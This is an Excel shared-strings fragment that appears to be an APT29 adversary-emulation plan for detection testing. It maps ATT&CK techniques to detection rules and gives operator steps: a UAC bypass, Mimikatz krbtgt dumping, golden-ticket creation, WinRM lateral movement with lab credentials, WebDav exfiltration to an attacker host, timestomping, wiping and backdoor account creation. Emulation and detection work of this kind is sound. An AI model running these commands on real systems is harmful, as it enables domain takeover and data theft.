    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t>Established network channel over the HTTPS protocol</t>
  </si>
  <si>
    <t>11.A.15</t>
  </si>
  <si>
    <t>T1573/T1573.002</t>
  </si>
  <si>
    <t>12.A.1</t>
  </si>
  <si>
    <t>Enumerated the System32 directory using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing (gci ((gci env:windir).Value + '\system32')</t>
  </si>
  <si>
    <t>12.A.2</t>
  </si>
  <si>
    <t>T1070/T1070.006</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Timestomp (T1070.006)</t>
  </si>
  <si>
    <t>Modified the time attributes of the kxwn.lock persistence payload using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe modifying the creation, last access, and last write times of kxwn.lock</t>
  </si>
  <si>
    <t>12.B.1</t>
  </si>
  <si>
    <t>T1518/T1518.001</t>
  </si>
  <si>
    <t>Software Discovery: Security Software Discovery (T1518.001)</t>
  </si>
  <si>
    <t>Enumerated registered AV products using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Get-WmiObject query for AntiVirusProduct</t>
  </si>
  <si>
    <t>12.C.1</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t xml:space="preserve">Query Registry </t>
  </si>
  <si>
    <t>1.Execute software</t>
  </si>
  <si>
    <t>Enumerated installed software via the Registry (Wow6432 Uninstall key) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Registry query for HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall</t>
  </si>
  <si>
    <t>12.C.2</t>
  </si>
  <si>
    <t>Enumerated installed software via the Registry (Uninstall key) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Registry query for HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</t>
  </si>
  <si>
    <t>13.A.1</t>
  </si>
  <si>
    <t>System Information Discovery (T1082)</t>
  </si>
  <si>
    <t>Enumerated the computer name using the GetComputerNameEx API</t>
  </si>
  <si>
    <t>powershell.exe executing the GetComputerNameEx API</t>
  </si>
  <si>
    <t>13.B.1</t>
  </si>
  <si>
    <t>System Network Configuration Discovery (T1016)</t>
  </si>
  <si>
    <t>1. Execute domain</t>
  </si>
  <si>
    <t>Enumerated the domain name using the NetWkstaGetInfo API</t>
  </si>
  <si>
    <t>powershell.exe executing the NetWkstaGetInfo API</t>
  </si>
  <si>
    <t>13.C.1</t>
  </si>
  <si>
    <t>System Owner/User Discovery (T1033)</t>
  </si>
  <si>
    <t>1. Execute user</t>
  </si>
  <si>
    <t>Enumerated the current username using the GetUserNameEx API</t>
  </si>
  <si>
    <t>powershell.exe executing the GetUserNameEx API</t>
  </si>
  <si>
    <t>13.D.1</t>
  </si>
  <si>
    <t>1. Execute pslist</t>
  </si>
  <si>
    <t>Enumerated running processes using the CreateToolhelp32Snapshot API</t>
  </si>
  <si>
    <t>powershell.exe executing the CreateToolhelp32Snapshot API</t>
  </si>
  <si>
    <t>14.A.1</t>
  </si>
  <si>
    <t>T1546/T1546.015</t>
  </si>
  <si>
    <t xml:space="preserve">Privilege Escalation </t>
  </si>
  <si>
    <t>Event Triggered Execution: Component Object Model Hijacking (T1546.015)</t>
  </si>
  <si>
    <t>14.A.2</t>
  </si>
  <si>
    <t>T1548/T1548.002</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)</t>
  </si>
  <si>
    <t>High integrity powrshell.exe spawning from control.exe (spawned from sdclt.exe)</t>
  </si>
  <si>
    <t>14.A.3</t>
  </si>
  <si>
    <t xml:space="preserve">Modify Registry </t>
  </si>
  <si>
    <t>Modified the Registry to remove artifacts of COM hijacking using PowerShell</t>
  </si>
  <si>
    <t>Deletion of the HKCU\Software\Classes\Folder\shell\Open\command subkey</t>
  </si>
  <si>
    <t>14.B.1</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Created and executed a WMI class using PowerShell</t>
  </si>
  <si>
    <t>14.B.2</t>
  </si>
  <si>
    <t>Enumerated and tracked PowerShell processes using PowerShell</t>
  </si>
  <si>
    <t>14.B.3</t>
  </si>
  <si>
    <t xml:space="preserve">Ingress Tool Transfer </t>
  </si>
  <si>
    <t>Downloaded and dropped Mimikatz (m.exe) to disk</t>
  </si>
  <si>
    <t>14.B.4</t>
  </si>
  <si>
    <t>T1003/T1003.011</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t>Dumped plaintext credentials using Mimikatz (m.exe)</t>
  </si>
  <si>
    <t>m.exe injecting into lsass.exe to dump credentials</t>
  </si>
  <si>
    <t>14.B.5</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Encoded and wrote Mimikatz output to a WMI class property using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Set-WmiInstance</t>
  </si>
  <si>
    <t>14.B.6</t>
  </si>
  <si>
    <t>Read and decoded Mimikatz output from a WMI class property using PowerShel</t>
  </si>
  <si>
    <t>powershell.exe executing Get-WmiInstance</t>
  </si>
  <si>
    <t>15.A.1</t>
  </si>
  <si>
    <t>powershell.exe executing $env:UserName</t>
  </si>
  <si>
    <t>15.A.2</t>
  </si>
  <si>
    <t>T1546/T1546.003</t>
  </si>
  <si>
    <t>Event Triggered Execution: Windows Management Instrumentation Event Subscription (T1546.003)</t>
  </si>
  <si>
    <t>Established WMI event subscription persistence using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe creating the WindowsParentalControlMigration WMI filter, consumer, and binding created in root/subscription</t>
  </si>
  <si>
    <t>16.A.1</t>
  </si>
  <si>
    <t>powershell.exe making LDAP queries over port 389 via functions from System.DirectoryServices.dll</t>
  </si>
  <si>
    <t>16.B.1</t>
  </si>
  <si>
    <t xml:space="preserve">System Owner/User Discovery </t>
  </si>
  <si>
    <t>Enumerated the domain SID (from current user SID) using the ConvertSidToStringSid API</t>
  </si>
  <si>
    <t>powershell.exe executing the ConvertSidToStringSid API</t>
  </si>
  <si>
    <t>16.B.2</t>
  </si>
  <si>
    <t>Executed the ConvertSidToStringSid API call by reflectively loading Advapi32.dll</t>
  </si>
  <si>
    <t>powershell.exe executing the ConvertSidToStringSid API function by loading Advapi32.dll</t>
  </si>
  <si>
    <t>16.C.1</t>
  </si>
  <si>
    <t>16.C.2</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>16.D.1</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>File write of m.exe by the WinRM process (wsmprovhost.exe)</t>
  </si>
  <si>
    <t>16.D.2</t>
  </si>
  <si>
    <t>T1003/T1003.001</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory (T1003.001)</t>
  </si>
  <si>
    <t>17.A.1</t>
  </si>
  <si>
    <t>T1114/T1114.001</t>
  </si>
  <si>
    <t>Email Collection: Local Email Collection (T1114.001)</t>
  </si>
  <si>
    <t>outlook.exe spawning from svchost.exe or powershell.exe</t>
  </si>
  <si>
    <t>17.B.1</t>
  </si>
  <si>
    <t>Read and collected a local file using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe reading the file MITRE-ATTACK-EVALS.HTML</t>
  </si>
  <si>
    <t>17.B.2</t>
  </si>
  <si>
    <t>Staged collected file into directory using PowerShell</t>
  </si>
  <si>
    <t>17.C.1</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility (T1560.001)</t>
  </si>
  <si>
    <t>Compressed a staging directory using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing the ZipFile.CreateFromDirectory .NET method</t>
  </si>
  <si>
    <t>17.C.2</t>
  </si>
  <si>
    <t>Prepended the GIF file header to a compressed staging file using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing Set-Content</t>
  </si>
  <si>
    <t>18.A.1</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t xml:space="preserve">Mapped a network drive to webdav using PowerShell </t>
  </si>
  <si>
    <t>18.A.2</t>
  </si>
  <si>
    <t>T1567/T1567.002</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t>powershell executing Copy-Item pointing to an attack-controlled WebDav network share (10.10.0.166:80)</t>
  </si>
  <si>
    <t>Exfiltrated staged collection to an webdav using PowerShell</t>
  </si>
  <si>
    <t>20.A.1</t>
  </si>
  <si>
    <t>T1218/T1218.011</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>rundll32.exe executing kxwn.lock</t>
  </si>
  <si>
    <t xml:space="preserve">Executed Run key persistence payload on user login using RunDll32
</t>
  </si>
  <si>
    <t>20.A.2</t>
  </si>
  <si>
    <t>Executed WMI persistence on user login</t>
  </si>
  <si>
    <t xml:space="preserve">The WMI process (wmiprvse.exe) executing powershell.exe
</t>
  </si>
  <si>
    <t>20.A.3</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell (T1059.001)</t>
  </si>
  <si>
    <t>SYSTEM-level powershell.exe spawned from the powershell.exe</t>
  </si>
  <si>
    <t xml:space="preserve">Executed PowerShell payload from WMI event subscription persistence
</t>
  </si>
  <si>
    <t>20.B.1</t>
  </si>
  <si>
    <t>T1550/T1550.003</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material (T1550)</t>
  </si>
  <si>
    <t xml:space="preserve">Created Kerberos Golden Ticket using Invoke-Mimikatz
</t>
  </si>
  <si>
    <t>20.B.2</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management (T1021.006)</t>
  </si>
  <si>
    <t>20.B.3</t>
  </si>
  <si>
    <t>T1136/T1136.001</t>
  </si>
  <si>
    <t>Create Account: Local Account (T1136.001)</t>
  </si>
  <si>
    <t>19.A</t>
  </si>
  <si>
    <t>19.B</t>
  </si>
  <si>
    <t>19.C</t>
  </si>
  <si>
    <t>1. wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"</t>
  </si>
  <si>
    <t>1. wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">User </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>local.admin</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> executed payload 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Established C2 channel </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(10.10.0.166)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> via PowerShell payload over port 443</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Used HTTPS to transport C2 </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(10.10.0.166)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> traffic</t>
    </r>
  </si>
  <si>
    <r>
      <t>1. loadmodule /var/www/webdav/APT29/Day2/S12/timestomp.ps1
2. Execute timestomp C:\Users\</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>local.admin</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>\AppData\Roaming\Microsoft\kxwn.lock</t>
    </r>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S12/stepTwelve.ps1
2. Execute detectav</t>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S13/stepThirteen.ps1
2. Execute comp</t>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S14/stepFourteen_bypassUAC.ps1
2. Execute bypass
3. You will now receive a new, high integrity callback</t>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S16/stepSixteen_SID.ps1
2. Execute siduser
3. Save the value for the domain SID (ex: S-1-5-21-2219224806-3979921203-557828661-1110) and delete the RID (ex: -1110) of the end (ex: S-1-5-21-2219224806-3979921203-557828661)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Interact with high integrity callback
2. loadmodule /var/www/webdav/APT29/Day2/S16/Invoke-WinRMSession.ps1 (available at https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-WinRMSession.ps1)
3. Execute invoke-winrmsession -Username </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>"domain.admin"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> -Password </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>"VMT3st#123"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> -IPAddress </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>20.20.101.203</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
4. Output will tell you a session opened and give you the format for using it, ex: Session opened, to run a command do the following: Invoke-Command -Session </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>$[session_id]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> -scriptblock {Get-Process} | out-string
5. Save the value for the session_id (ex: $hzaqx)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Execute Copy-Item m.exe -Destination "C:\Windows\System32\" -ToSession </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>$[session_id]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
m.exe is a copy of the Mimikatz executable (available at https://github.com/gentilkiwi/mimikatz)
2. Execute Invoke-Command -Session $[session_id] -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string
3. Take note of value for the NTLM hash (ex: NTLM : f4a688010d80770a55a22893dc6ac510) near the top (Under RID and User after * Primary)
4. Execute Get-PSSession | Remove-PSSession</t>
    </r>
  </si>
  <si>
    <r>
      <t>1. Interact with high integrity callback
2. Execute New-Item -Path "C:\Windows\Temp\" -Name "WindowsParentalControlMigration" -ItemType "directory"
3. Execute Copy-Item "C:\Users\</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>local.admin</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration"</t>
    </r>
  </si>
  <si>
    <t>net.exe adding the user tlabuser1</t>
  </si>
  <si>
    <t>dst ~ "10.10.0.166"</t>
  </si>
  <si>
    <t>reg_target_object ~ "\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Webcache"</t>
  </si>
  <si>
    <t>WMI Process (WmiPrvSE.exe) executing powershell.exe</t>
  </si>
  <si>
    <t>target_process_path ~ "lsass.exe"</t>
  </si>
  <si>
    <t>powershell.exe creating the file \MITRE-ATTACK-EVALS.HTML</t>
  </si>
  <si>
    <t>Dumped messages from the local Outlook Sent using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe downloading and/or the file write of file</t>
  </si>
  <si>
    <t>1. Go to /var/www/webdav/APT29/Day2/S14 then run $python -m SimpleHTTPServer 8080
Confirm m.exe is there and is a Windows PE ($ file m)
* m.exe is a copy of the Mimikatz executable (available at https://github.com/gentilkiwi/mimikatz)
2. Interact with new callback (high privilege)
3. loadmodule /var/www/webdav/APT29/Day2/S14/stepFourteen_credDump.ps1
4. Execute wmidump
5. Kill the python server (CTRL-C) once you see a GET request on the python server (VM terminal)</t>
  </si>
  <si>
    <t>1. Interact with low integrity callback
2. loadmodule /var/www/webdav/APT29/Day2/S16/powerview.ps1 (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
3. Execute get-netdomaincontroller</t>
  </si>
  <si>
    <t>1. Interact with low integrity callback
2. loadmodule /var/www/webdav/APT29/Day2/S17/stepSeventeen_email.ps1
3. Execute psemail</t>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S17/stepSeventeen_zip.ps1
2. # zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration</t>
  </si>
  <si>
    <t xml:space="preserve">1. net use Z: https://webdav.com:1443/webdav 
2. # Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "Z:\APT29\WindowsParentalControlMigration.tmp"
</t>
  </si>
  <si>
    <t>1. loadmodule /var/www/webdav/APT29/Day2/S19/wipe.ps1 
2. wipe "C:\Windows\System32\m.exe"</t>
  </si>
  <si>
    <t>1.Execute restart-computer -force 2. Existing 2 callbacks should die
3. RDP and login to initial victim once it reboots
4. Persistence mechanisms should fire on login (1 for DLL, 1 or more for WMI event subscription)
You may need to repeat login process a few times (close and reopen RDP session) for WMI execute to fire</t>
  </si>
  <si>
    <t>1. Interact with the SYSTEM PS callback (from WMI)
2. Execute klist purge
3. loadmodule  /var/www/webdav/APT29/Day2/S20/IM.ps1 (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1)
4. Execute invoke-mimikatz -command '"kerberos::golden /domain:testlab.com /sid:[SID] /rc4:[NTLM HASH] /user:domain.admin /ptt"' using the SID and NTLM values from earlier
5. Execute klist and confirm ticket is in cache
6. Execute Enter-PSSession "210WIN10"
7. Execute Invoke-Command -ComputerName "210WIN10" -ScriptBlock {net user /add tlabuser1 "VMT3st#123"}</t>
  </si>
  <si>
    <t>source_commandline ~ "Win32_BIOS"</t>
  </si>
  <si>
    <t>source_commandline ~ "PnPEntity"</t>
  </si>
  <si>
    <t>source_commandline ~ "Win32_ComputerSystem"</t>
  </si>
  <si>
    <t>source_commandline ~ "Win32_Process"</t>
  </si>
  <si>
    <t>source_commandline ~ "Get-Item"</t>
  </si>
  <si>
    <t>Detection Type</t>
  </si>
  <si>
    <t>source_commandline ~ "gci"</t>
  </si>
  <si>
    <t>source_commandline ~ "Get-WmiObject"</t>
  </si>
  <si>
    <t>reg_object_target ~ "Wow6432Node"</t>
  </si>
  <si>
    <t>source_commandline ~ "GetComputerNameEx"</t>
  </si>
  <si>
    <t>source_commandline ~ "NetWkstaGetInfo"</t>
  </si>
  <si>
    <t>source_commandline ~ "GetUserNameEx"</t>
  </si>
  <si>
    <t>source_commandline ~ "CreateToolhelp32Snapshot"</t>
  </si>
  <si>
    <t>reg_object_target ~ "Folder"</t>
  </si>
  <si>
    <t>source_process_path ~ "sdclt.exe"</t>
  </si>
  <si>
    <t>source_commandline ~ "Get-Process"</t>
  </si>
  <si>
    <t>file_path ~ "\m.exe"</t>
  </si>
  <si>
    <t>source_commandline ~ "Get-WmiInstance"</t>
  </si>
  <si>
    <t>source_commandline ~ "Set-WmiInstance"</t>
  </si>
  <si>
    <t>source_commandline ~ "$env:UserName"</t>
  </si>
  <si>
    <t>source_commandline ~ "root/subscription"</t>
  </si>
  <si>
    <t>source_commandline ~ "siduser"</t>
  </si>
  <si>
    <t>source_commandline ~ "Advapi32.dll"</t>
  </si>
  <si>
    <t>dst = "20.20.101.203" AND dpt = "5985"</t>
  </si>
  <si>
    <t>user_name ~ "domain.admin"</t>
  </si>
  <si>
    <t>file_path ~ "MITRE-ATTACK-EVALS.HTML"</t>
  </si>
  <si>
    <t>source_commandline ~ "Set-Content"</t>
  </si>
  <si>
    <t>source_process_path ~ "rundll32.exe"</t>
  </si>
  <si>
    <t>powershell.exe executing IM with command-line arguments to create a golden ticket</t>
  </si>
  <si>
    <t>source_commandline ~ "IM'"</t>
  </si>
  <si>
    <t>dst = "20.20.101.210" AND Computer ~ "209"</t>
  </si>
  <si>
    <t>General</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Enumerated the domain controller host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(20.20.101.203)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> using LDAP queries</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Established a WinRM connection to the domain controller host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012 (20.20.101.203)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Logged on to the domain controller host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012 (20.20.101.203)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> using valid credentials for user </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>domain.admin</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Dropped Mimikatz (m.exe) to disk on the domain controller host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012 (20.20.101.203)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> over a WinRM connection</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Dumped the KRBTGT hash on the domain controller host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012 (20.20.101.203)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> using Mimikatz (m.exe)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Evidence that the network data sent over the C2 channel is </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>encrypted</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Used HTTPS to encrypt C2  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(10.10.0.166)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> traffic
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Network connection to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012 (20.20.101.203)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> over port </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>5985</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Successful logon as user </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>domain.admin</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> on </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>winserver2012 (20.20.101.203)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net.exe with command-line arguments then making a network connection to a webdav server over port </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>1443</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">powershell executing Copy-Item pointing to an attack-controlled WebDav network share </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(10.10.0.166:1443)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Established a WinRM connection to the remote host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>210WIN10</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(20.20.101.210)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> using the Golden Ticket as credentials
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Added a new user to the remote host </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
